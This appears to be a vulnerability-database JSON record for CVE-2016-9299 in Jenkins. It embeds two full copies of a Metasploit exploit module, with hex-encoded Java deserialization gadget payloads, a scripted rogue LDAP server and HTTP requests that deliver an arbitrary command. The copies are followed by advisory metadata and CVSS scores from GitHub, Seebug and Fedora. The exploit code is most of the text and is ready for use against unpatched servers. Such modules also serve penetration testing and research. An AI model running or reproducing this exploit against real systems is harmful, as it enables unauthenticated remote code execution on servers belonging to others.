\"aced00057372002b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e466c6174334d6170a300f47ee17184980300007870770400000002737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced530200014c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b0300007870737200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c656d656e747371007e0003787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a65787000000001770400000001740008041ac080131d170678787371007e00090000000077040000000078737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e63757272656e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870707372001f636f6d2e73756e2e6a6e64692e6c6461702e4c646170417474726962757465c47b6b02a60583c00300034c000a62617365437478456e767400154c6a6176612f7574696c2f486173687461626c653b4c000a6261736543747855524c7400124c6a6176612f6c616e672f537472696e673b4c000372646e7400134c6a617661782f6e616d696e672f4e616d653b787200256a617661782e6e616d696e672e6469726563746f72792e4261
7369634174747269627574655d95d32a668565be0300025a00076f7264657265644c000661747472494471007e001778700074000077040000000078707400156c6461703a2f2f6c6f63616c686f73743a313233347372001a6a617661782e6e616d696e672e436f6d706f736974654e616d6517251a4b93d67afe0300007870770400000000787871007e000e707871007e000e78\"\r\n # java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections6 'touch /tmp/wtf'\r\n STAGE2 = \"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\"\r\n \r\n SEARCH_REQUEST = 3\r\n SEARCH_RES_ENTRY = 4\r\n SEARCH_RES_DONE = 5\r\n ABANDON_REQUEST = 16\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Jenkins CLI HTTP Java Deserialization Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on\r\n the Jenkins, which allows remote arbitrary code execution via HTTP. Authentication is not\r\n required to exploit this vulnerability.\r\n \r\n },\r\n 'Author' =>\r\n [\r\n 'Matthias Kaiser', # Original Vulnerability discovery\r\n 'Alisa Esage', # Private Exploit\r\n 'Ivan', # Metasploit Module Author\r\n 'YSOSerial' #Stage 2 payload\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['linux', 'unix'],\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' => [ [ 'Jenkins 2.31', {} ] ],\r\n 'References' =>\r\n [\r\n ['CVE', '2016-9299'],\r\n ['URL', 'https://github.com/jenkinsci-cert/SECURITY-218'],\r\n ['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16'],\r\n ['URL', 'http://www.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class-deepsec-edition'],\r\n ['URL', 'https://github.com/frohoff/ysoserial']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd'\r\n }\r\n },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Nov 16 2016'\r\n ))\r\n \r\n register_options([\r\n OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),\r\n 
Opt::RPORT('8080'),\r\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on for the ldap server. This must be an address on the local machine or 0.0.0.0\", '127.0.0.1' ]),\r\n OptPort.new('SRVPORT', [ true, \"The local port to listen on for the ldap server.\", 1389 ]),\r\n OptAddress.new('LDAPHOST', [ true, \"The ldap host the exploit will try to connect to \", '127.0.0.1' ])\r\n ])\r\n end\r\n \r\n def target_uri\r\n begin\r\n URI(datastore['TARGETURI'])\r\n rescue ::URI::InvalidURIError\r\n print_error \"Invalid URI: #{datastore['TARGETURI'].inspect}\"\r\n raise Msf::OptionValidateError.new(['TARGETURI'])\r\n end\r\n end\r\n \r\n def normalize_uri(*strs)\r\n new_str = strs * \"/\"\r\n \r\n new_str = new_str.gsub!(\"//\", \"/\") while new_str.index(\"//\")\r\n \r\n # Makes sure there's a starting slash\r\n unless new_str[0,1] == '/'\r\n new_str = '/' + new_str\r\n end\r\n \r\n new_str\r\n end\r\n \r\n def aseq(x, tag)\r\n s = seq(x)\r\n s.tag_class = :APPLICATION\r\n s.tag = tag\r\n s\r\n end\r\n \r\n def seq(x)\r\n OpenSSL::ASN1::Sequence.new(x)\r\n end\r\n \r\n def int(x)\r\n OpenSSL::ASN1::Integer.new(x)\r\n end\r\n \r\n def string(x)\r\n OpenSSL::ASN1::OctetString.new(x)\r\n end\r\n \r\n def set(x)\r\n OpenSSL::ASN1::Set.new(x)\r\n end\r\n \r\n def enum(x)\r\n OpenSSL::ASN1::Enumerated.new(x)\r\n end\r\n \r\n \r\n def java_string(s)\r\n length = s.length\r\n \r\n packed_length = [length].pack(\"S>\")\r\n \r\n \"#{packed_length}#{s}\"\r\n end\r\n \r\n def search_res_done(message_id)\r\n s = seq([\r\n int(message_id),\r\n aseq([enum(0), string(\"\"), string(\"\")], SEARCH_RES_DONE)\r\n ])\r\n s.to_der\r\n end\r\n \r\n def make_stage2(command)\r\n [STAGE2].pack(\"H*\").gsub(\"\\x00\\x0Etouch /tmp/wtf\", java_string(command))\r\n end\r\n \r\n \r\n def make_stage2_reply(command, message_id)\r\n \r\n java_class_name_attributes = seq([string(\"javaClassName\"), set([string(\"WTF\")])])\r\n java_serialized_data_attributes = 
seq([string(\"javaSerializedData\"), set([string(make_stage2(command))])])\r\n attributes = seq([java_class_name_attributes, java_serialized_data_attributes])\r\n s = seq([\r\n int(message_id),\r\n aseq([string(\"cn=wtf, dc=example, dc=com\"), attributes], SEARCH_RES_ENTRY)])\r\n s.to_der\r\n end\r\n \r\n \r\n \r\n def make_stage1(ldap_url)\r\n [STAGE1].pack(\"H*\").gsub(\"\\x00\\x15ldap://localhost:1234\", java_string(ldap_url))\r\n end\r\n \r\n \r\n def read_ldap_packet(socket)\r\n \r\n buffer = \"\"\r\n \r\n bytes = socket.read(2)\r\n if bytes[0] != \"0\"\r\n raise \"NOT_LDAP: #{bytes.inspect} #{bytes[0]}\"\r\n end\r\n \r\n buffer << bytes\r\n \r\n length = bytes[1].ord\r\n if (length & (1<<7)) != 0\r\n length_bytes_length = length ^ (1<<7)\r\n \r\n length_bytes = socket.read(length_bytes_length)\r\n buffer << length_bytes\r\n length = length_bytes.bytes.reduce(0) {|c, e| (c << 8) + e}\r\n end\r\n \r\n buffer << socket.read(length)\r\n buffer\r\n end\r\n \r\n \r\n def write_chunk(socket, chunk)\r\n socket.write(chunk.bytesize.to_s(16) + \"\\r\\n\")\r\n socket.write(chunk)\r\n socket.write(\"\\r\\n\")\r\n end\r\n \r\n def exploit\r\n uuid = SecureRandom.uuid\r\n \r\n ldap_port = datastore[\"SRVPORT\"]\r\n ldap_host = datastore[\"SRVHOST\"]\r\n ldap_external_host = datastore[\"LDAPHOST\"]\r\n \r\n command = payload.encoded\r\n host = datastore[\"RHOST\"]\r\n \r\n ldap = TCPServer.new(ldap_host, ldap_port)\r\n \r\n cli_path = normalize_uri(target_uri.path, \"cli\")\r\n \r\n begin\r\n \r\n download = connect()\r\n \r\n begin\r\n \r\n download.write(\"POST #{cli_path} HTTP/1.1\\r\\n\" +\r\n \"Host: #{host}\\r\\n\" +\r\n \"User-Agent: curl/7.36.0\\r\\n\" +\r\n \"Accept: */*\\r\\n\" +\r\n \"Session: #{uuid}\\r\\n\" +\r\n \"Side: download\\r\\n\" +\r\n \"Content-Length: 0\\r\\n\" +\r\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\\r\\n\")\r\n \r\n download.read(20)\r\n \r\n upload = connect()\r\n begin\r\n upload.write(\"POST #{cli_path} HTTP/1.1\\r\\n\" 
+\r\n \"Host: #{host}\\r\\n\" +\r\n \"User-Agent: curl/7.36.0\\r\\n\" +\r\n \"Accept: */*\\r\\n\" +\r\n \"Session: #{uuid}\\r\\n\" +\r\n \"Side: upload\\r\\n\" +\r\n \"Content-type: application/octet-stream\\r\\n\" +\r\n \"Transfer-Encoding: chunked\\r\\n\\r\\n\")\r\n \r\n write_chunk(upload, \"<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\")\r\n write_chunk(upload, \"\\00\\00\\00\\00\")\r\n \r\n upload.flush\r\n \r\n stage1 = make_stage1(\"ldap://#{ldap_external_host}:#{ldap_port}\")\r\n \r\n chunk_header = [stage1.bytesize].pack(\"S>\")\r\n write_chunk(upload, chunk_header + stage1)\r\n \r\n upload.flush\r\n \r\n client = ldap.accept\r\n begin\r\n \r\n # this hardcodes an ldap conversation\r\n \r\n # read bindRequest\r\n read_ldap_packet(client)\r\n \r\n # write bindResponse\r\n client.write([\"300c02010161070a010004000400\"].pack(\"H*\"))\r\n \r\n # read searchRequest\r\n read_ldap_packet(client)\r\n \r\n # write searchResEntry\r\n client.write([\"3034020102642f04066f753d777466302530230411737562736368656d61537562656e747279310e040c636e3d737562736368656d61\"].pack(\"H*\"))\r\n \r\n # write searchResDone\r\n client.write(search_res_done(2))\r\n \r\n # read abandonReqeust or searchRequest\r\n bytes = read_ldap_packet(client)\r\n packet = OpenSSL::ASN1.decode(bytes)\r\n \r\n # abandonRequest packet is sometimes sent\r\n # so we distinguish between abandonRequest/searchRequest\r\n \r\n tag = packet.value[1].tag\r\n if tag == ABANDON_REQUEST\r\n \r\n bytes = read_ldap_packet(client)\r\n packet = OpenSSL::ASN1.decode(bytes)\r\n tag = packet.value[1].tag\r\n end\r\n \r\n if tag == SEARCH_REQUEST\r\n \r\n message_id = packet.value[0].value.to_int\r\n # write searchResEntry\r\n client.write(make_stage2_reply(command, message_id))\r\n \r\n # write searchResDone\r\n client.write(search_res_done(message_id))\r\n else\r\n raise \"Unexpected packet: #{tag}\"\r\n end\r\n \r\n client.flush\r\n ensure\r\n 
client.close\r\n end\r\n ensure\r\n upload.close\r\n end\r\n ensure\r\n download.close\r\n end\r\n \r\n ensure\r\n ldap.close\r\n end\r\n end\r\n \r\n def check\r\n result = Exploit::CheckCode::Safe\r\n \r\n begin\r\n if vulnerable?\r\n result = Exploit::CheckCode::Vulnerable\r\n end\r\n rescue Msf::Exploit::Failed => e\r\n vprint_error(e.message)\r\n return Exploit::CheckCode::Unknown\r\n end\r\n \r\n result\r\n end\r\n \r\n def vulnerable?\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path)\r\n })\r\n unless res\r\n fail_with(Failure::Unknown, 'The connection timed out.')\r\n end\r\n \r\n http_headers = res.headers\r\n \r\n http_headers['X-Jenkins'] && http_headers['X-Jenkins'] <= \"2.31\"\r\n end\r\n \r\n # Connects to the server, creates a request, sends the request,\r\n # reads the response\r\n #\r\n # Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.\r\n #\r\n def send_request_cgi(opts={}, timeout = 20)\r\n \r\n begin\r\n c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])\r\n c.connect\r\n r = c.request_cgi(opts)\r\n c.send_recv(r, timeout)\r\n rescue ::Errno::EPIPE, ::Timeout::Error\r\n nil\r\n end\r\n end\r\n \r\nend\n\n# 0day.today [2018-05-18] #", "sourceHref": "https://0day.today/exploit/30370", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-05-17T17:16:34", "description": "", "cvss3": {}, "published": "2018-05-16T00:00:00", "type": "packetstorm", "title": "Jenkins CLI HTTP Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2018-05-16T00:00:00", "id": "PACKETSTORM:147665", "href": "https://packetstormsecurity.com/files/147665/Jenkins-CLI-HTTP-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass 
MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nSTAGE1 = \"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\" \n# java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections6 'touch /tmp/wtf' \nSTAGE2 = \"aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99
0200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000e746f756368202f746d702f777466740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878\" \n \nSEARCH_REQUEST = 3 \nSEARCH_RES_ENTRY = 4 \nSEARCH_RES_DONE = 5 \nABANDON_REQUEST = 16 \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Jenkins CLI HTTP Java Deserialization Vulnerability', \n'Description' => %q{ \nThis module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on \nthe Jenkins, which allows remote arbitrary code execution via HTTP. Authentication is not \nrequired to exploit this vulnerability. 
\n \n}, \n'Author' => \n[ \n'Matthias Kaiser', # Original Vulnerability discovery \n'Alisa Esage', # Private Exploit \n'Ivan', # Metasploit Module Author \n'YSOSerial' #Stage 2 payload \n], \n'License' => MSF_LICENSE, \n'Platform' => ['linux', 'unix'], \n'Arch' => ARCH_CMD, \n'Targets' => [ [ 'Jenkins 2.31', {} ] ], \n'References' => \n[ \n['CVE', '2016-9299'], \n['URL', 'https://github.com/jenkinsci-cert/SECURITY-218'], \n['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16'], \n['URL', 'http://www.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class-deepsec-edition'], \n['URL', 'https://github.com/frohoff/ysoserial'] \n], \n'Payload' => \n{ \n'Compat' => \n{ \n'PayloadType' => 'cmd' \n} \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Nov 16 2016' \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']), \nOpt::RPORT('8080'), \nOptAddress.new('SRVHOST', [ true, \"The local host to listen on for the ldap server. 
This must be an address on the local machine or 0.0.0.0\", '127.0.0.1' ]), \nOptPort.new('SRVPORT', [ true, \"The local port to listen on for the ldap server.\", 1389 ]), \nOptAddress.new('LDAPHOST', [ true, \"The ldap host the exploit will try to connect to \", '127.0.0.1' ]) \n]) \nend \n \ndef target_uri \nbegin \nURI(datastore['TARGETURI']) \nrescue ::URI::InvalidURIError \nprint_error \"Invalid URI: #{datastore['TARGETURI'].inspect}\" \nraise Msf::OptionValidateError.new(['TARGETURI']) \nend \nend \n \ndef normalize_uri(*strs) \nnew_str = strs * \"/\" \n \nnew_str = new_str.gsub!(\"//\", \"/\") while new_str.index(\"//\") \n \n# Makes sure there's a starting slash \nunless new_str[0,1] == '/' \nnew_str = '/' + new_str \nend \n \nnew_str \nend \n \ndef aseq(x, tag) \ns = seq(x) \ns.tag_class = :APPLICATION \ns.tag = tag \ns \nend \n \ndef seq(x) \nOpenSSL::ASN1::Sequence.new(x) \nend \n \ndef int(x) \nOpenSSL::ASN1::Integer.new(x) \nend \n \ndef string(x) \nOpenSSL::ASN1::OctetString.new(x) \nend \n \ndef set(x) \nOpenSSL::ASN1::Set.new(x) \nend \n \ndef enum(x) \nOpenSSL::ASN1::Enumerated.new(x) \nend \n \n \ndef java_string(s) \nlength = s.length \n \npacked_length = [length].pack(\"S>\") \n \n\"#{packed_length}#{s}\" \nend \n \ndef search_res_done(message_id) \ns = seq([ \nint(message_id), \naseq([enum(0), string(\"\"), string(\"\")], SEARCH_RES_DONE) \n]) \ns.to_der \nend \n \ndef make_stage2(command) \n[STAGE2].pack(\"H*\").gsub(\"\\x00\\x0Etouch /tmp/wtf\", java_string(command)) \nend \n \n \ndef make_stage2_reply(command, message_id) \n \njava_class_name_attributes = seq([string(\"javaClassName\"), set([string(\"WTF\")])]) \njava_serialized_data_attributes = seq([string(\"javaSerializedData\"), set([string(make_stage2(command))])]) \nattributes = seq([java_class_name_attributes, java_serialized_data_attributes]) \ns = seq([ \nint(message_id), \naseq([string(\"cn=wtf, dc=example, dc=com\"), attributes], SEARCH_RES_ENTRY)]) \ns.to_der \nend \n \n \n \ndef 
make_stage1(ldap_url) \n[STAGE1].pack(\"H*\").gsub(\"\\x00\\x15ldap://localhost:1234\", java_string(ldap_url)) \nend \n \n \ndef read_ldap_packet(socket) \n \nbuffer = \"\" \n \nbytes = socket.read(2) \nif bytes[0] != \"0\" \nraise \"NOT_LDAP: #{bytes.inspect} #{bytes[0]}\" \nend \n \nbuffer << bytes \n \nlength = bytes[1].ord \nif (length & (1<<7)) != 0 \nlength_bytes_length = length ^ (1<<7) \n \nlength_bytes = socket.read(length_bytes_length) \nbuffer << length_bytes \nlength = length_bytes.bytes.reduce(0) {|c, e| (c << 8) + e} \nend \n \nbuffer << socket.read(length) \nbuffer \nend \n \n \ndef write_chunk(socket, chunk) \nsocket.write(chunk.bytesize.to_s(16) + \"\\r\\n\") \nsocket.write(chunk) \nsocket.write(\"\\r\\n\") \nend \n \ndef exploit \nuuid = SecureRandom.uuid \n \nldap_port = datastore[\"SRVPORT\"] \nldap_host = datastore[\"SRVHOST\"] \nldap_external_host = datastore[\"LDAPHOST\"] \n \ncommand = payload.encoded \nhost = datastore[\"RHOST\"] \n \nldap = TCPServer.new(ldap_host, ldap_port) \n \ncli_path = normalize_uri(target_uri.path, \"cli\") \n \nbegin \n \ndownload = connect() \n \nbegin \n \ndownload.write(\"POST #{cli_path} HTTP/1.1\\r\\n\" + \n\"Host: #{host}\\r\\n\" + \n\"User-Agent: curl/7.36.0\\r\\n\" + \n\"Accept: */*\\r\\n\" + \n\"Session: #{uuid}\\r\\n\" + \n\"Side: download\\r\\n\" + \n\"Content-Length: 0\\r\\n\" + \n\"Content-Type: application/x-www-form-urlencoded\\r\\n\\r\\n\") \n \ndownload.read(20) \n \nupload = connect() \nbegin \nupload.write(\"POST #{cli_path} HTTP/1.1\\r\\n\" + \n\"Host: #{host}\\r\\n\" + \n\"User-Agent: curl/7.36.0\\r\\n\" + \n\"Accept: */*\\r\\n\" + \n\"Session: #{uuid}\\r\\n\" + \n\"Side: upload\\r\\n\" + \n\"Content-type: application/octet-stream\\r\\n\" + \n\"Transfer-Encoding: chunked\\r\\n\\r\\n\") \n \nwrite_chunk(upload, \"<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\") \nwrite_chunk(upload, \"\\00\\00\\00\\00\") \n \nupload.flush 
\n \nstage1 = make_stage1(\"ldap://#{ldap_external_host}:#{ldap_port}\") \n \nchunk_header = [stage1.bytesize].pack(\"S>\") \nwrite_chunk(upload, chunk_header + stage1) \n \nupload.flush \n \nclient = ldap.accept \nbegin \n \n# this hardcodes an ldap conversation \n \n# read bindRequest \nread_ldap_packet(client) \n \n# write bindResponse \nclient.write([\"300c02010161070a010004000400\"].pack(\"H*\")) \n \n# read searchRequest \nread_ldap_packet(client) \n \n# write searchResEntry \nclient.write([\"3034020102642f04066f753d777466302530230411737562736368656d61537562656e747279310e040c636e3d737562736368656d61\"].pack(\"H*\")) \n \n# write searchResDone \nclient.write(search_res_done(2)) \n \n# read abandonReqeust or searchRequest \nbytes = read_ldap_packet(client) \npacket = OpenSSL::ASN1.decode(bytes) \n \n# abandonRequest packet is sometimes sent \n# so we distinguish between abandonRequest/searchRequest \n \ntag = packet.value[1].tag \nif tag == ABANDON_REQUEST \n \nbytes = read_ldap_packet(client) \npacket = OpenSSL::ASN1.decode(bytes) \ntag = packet.value[1].tag \nend \n \nif tag == SEARCH_REQUEST \n \nmessage_id = packet.value[0].value.to_int \n# write searchResEntry \nclient.write(make_stage2_reply(command, message_id)) \n \n# write searchResDone \nclient.write(search_res_done(message_id)) \nelse \nraise \"Unexpected packet: #{tag}\" \nend \n \nclient.flush \nensure \nclient.close \nend \nensure \nupload.close \nend \nensure \ndownload.close \nend \n \nensure \nldap.close \nend \nend \n \ndef check \nresult = Exploit::CheckCode::Safe \n \nbegin \nif vulnerable? \nresult = Exploit::CheckCode::Vulnerable \nend \nrescue Msf::Exploit::Failed => e \nvprint_error(e.message) \nreturn Exploit::CheckCode::Unknown \nend \n \nresult \nend \n \ndef vulnerable? 
\nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path) \n}) \nunless res \nfail_with(Failure::Unknown, 'The connection timed out.') \nend \n \nhttp_headers = res.headers \n \nhttp_headers['X-Jenkins'] && http_headers['X-Jenkins'] <= \"2.31\" \nend \n \n# Connects to the server, creates a request, sends the request, \n# reads the response \n# \n# Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi. \n# \ndef send_request_cgi(opts={}, timeout = 20) \n \nbegin \nc = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT']) \nc.connect \nr = c.request_cgi(opts) \nc.send_recv(r, timeout) \nrescue ::Errno::EPIPE, ::Timeout::Error \nnil \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147665/jenkins_ldap_deserialize.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "github": [{"lastseen": "2023-01-27T05:06:55", "description": "The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-14T01:00:43", "type": "github", "title": "Improper Neutralization of Special Elements used in an LDAP Query in Jenkins", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2023-01-27T05:02:34", "id": "GHSA-2X9H-H3C4-WQQH", "href": "https://github.com/advisories/GHSA-2x9h-h3c4-wqqh", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T12:02:40", "description": "No description provided by source.", "cvss3": {}, "published": "2016-11-26T00:00:00", "type": "seebug", "title": "Jenkins remoting module remote command execution vulnerability, CVE-2016-9299\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2016-11-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92557", "id": "SSV:92557", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "This package is primarily used by Jenkins for slave node management, but it could be potentially reused outside of this project. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-01T15:57:40", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: jenkins-remoting-2.62.3-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2016-12-01T15:57:40", "id": "FEDORA:00FE3602E41B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZW2KUKYLNLVDB7STLHLYALCUFLEGCRM6/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Jenkins is an award-winning, cross-platform, continuous integration and continuous delivery application that increases your productivity. Use Jenkins to build and test your software projects continuously making it easier for developers to integrate changes to the project, and making it easier for users to obtain a fresh build. It also allows you to continuously deliver your software by providing powerful ways to define your build pipelines and integrating with a large number of testing and deployment technologies. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-01T15:57:40", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: jenkins-1.651.3-2.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, 